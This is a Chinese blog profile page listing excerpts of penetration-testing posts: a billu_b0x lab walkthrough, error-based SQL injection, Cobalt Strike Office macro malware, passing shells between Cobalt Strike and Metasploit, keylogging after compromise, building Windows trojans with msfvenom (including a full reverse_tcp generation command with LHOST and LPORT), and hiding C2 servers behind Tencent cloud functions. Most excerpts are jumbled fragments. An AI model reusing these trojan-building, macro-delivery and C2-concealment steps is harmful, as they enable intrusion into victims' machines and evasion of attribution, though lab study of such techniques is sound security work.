- 博客(10)
- 收藏
- 关注
原创 billu_b0x打靶思路
2.全端口扫描:确定靶机ip后,扫描靶机ip的全端口(1-65535),探测开放的端口,命令如下:--min-rate 10000的意思是让nmap以不小于每秒10000次的速率进行扫。可以看到请求中load参数添加的是show,我们修改这个参数为刚刚图片马的路径,并在请求体的第一行添加命令a=whoami,看看能否触发代码执行:成功了。4.服务版本探测:这一步通常基于第二步开放端口的探测结果,进一步扫描每个端口对应的服务版本和操作系统,得到更具体的信息。登陆后就到了panel.php。
2025-03-28 13:13:26
797
原创 sql报错注入
最后:select count(*),floor(rand(0)*2)x from information_schema.tables group by x。rand(0) 返回0-1之间的数。floor() 向下取整。-- 基于Xpath 报错。count(*) 计数。记录一下,方便之后自己注入。
2024-09-26 15:01:27
374
1
原创 centos7中docker搭建及openwrt配置
7.在浏览器输入设置的option ipaddr成功启动。3.创建macvlan网络(根据上步获得信息修改ip)Linux 内核:官方建议 3.10 以上。4.设置yum源(都能用,选一个)2.使用root权限更新yum包。3.如果之前安装过,卸载旧版本。1.下载openwrt镜像。7.启动并设置开机自启。4.将防火墙桥接到主机。根据之前获得信息修改。
2024-06-21 23:21:24
655
原创 cs生成office宏病毒获取shell
编写主体内容后,点击“开发工具—VisualBasic”,双击“ThisDocument”打开Word文档,点击“Word选项—自定义功能区—开发者工具(勾选)—确定”。,将原有内容全部清空,然后将宏payload全部粘贴进去,保存并关闭该VBA编。kali(服务端):192.168.216.40。首先,启动cs的应用界面,这里用的是cs4.8。上面原来有一个监听不用管(当没有就好)最后上传到win10打开后成功获取到权限。win11(客户端)
2024-06-19 00:00:00
352
原创 Cs与msf互传shell
首先咋们需要准备两台kali,一台win10靶机咋们利用kali1打开cs,利用kali2打开msf进行联动;在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)然后在kali2启动msf,使用监听模块命令:msfconsole //进入msf控制台use exploit/multi/handler //进入监听模块。
2024-06-02 00:40:48
463
原创 获取shell后各种命令及操作
假设目标机器上有鼠标指针,那么说明可以输入内容,那我们就可以使用。这个时候,目标的记事本里就多出了一些内容,就是我们刚刚输入的。如果其它程序需要访问这个内网环境,就可以建立。目标机器输入东西的话,就可以获取到键盘记录。:显示自己当前系统的所有文件和文件夹。:列出当前路径下的所有文件和文件夹。指定一个自定义的变量,以确定输出格式。: 使用当前伪造的线程令牌运行进程。进行记录的导出,如果不想监听了才。:使用当前伪造的线程令牌运行进程。加载扩展后,我们可以使用基本的。当然,也可以上传很多扩展,比。
2024-05-31 19:55:20
1118
原创 msfconsole之制作windows木马并成功获取shell(正向payload)
还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了!将生成的文件在靶机中打开,利用netstat -ano查看打开的端口。
2024-05-27 18:31:29
1186
原创 msfconsole之制作windows木马并成功获取shell(反向payload)
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
2024-05-27 16:31:51
828
原创 使用腾讯云函数隐藏C2
腾讯云云函数(Serverless Cloud Function,SCF),可以为企业和开发者提供无服务器执行环境,无需购买和管理服务器,只要在腾讯云上使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯云基础设施上弹性、安全地运行代码。所有的流量都是通过腾讯云函数进行转发,因此溯源后门只能得到腾讯云的域名和IP,且云函数的服务器是自带 CDN 的,能够很好的隐藏我们的C2服务器。发布成功,到这里我们的云函数和触发器就配置成功了。域前置,走cdn域名,利用云函数。保存,生成后门进行测试。
2024-05-23 16:40:08
1075
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人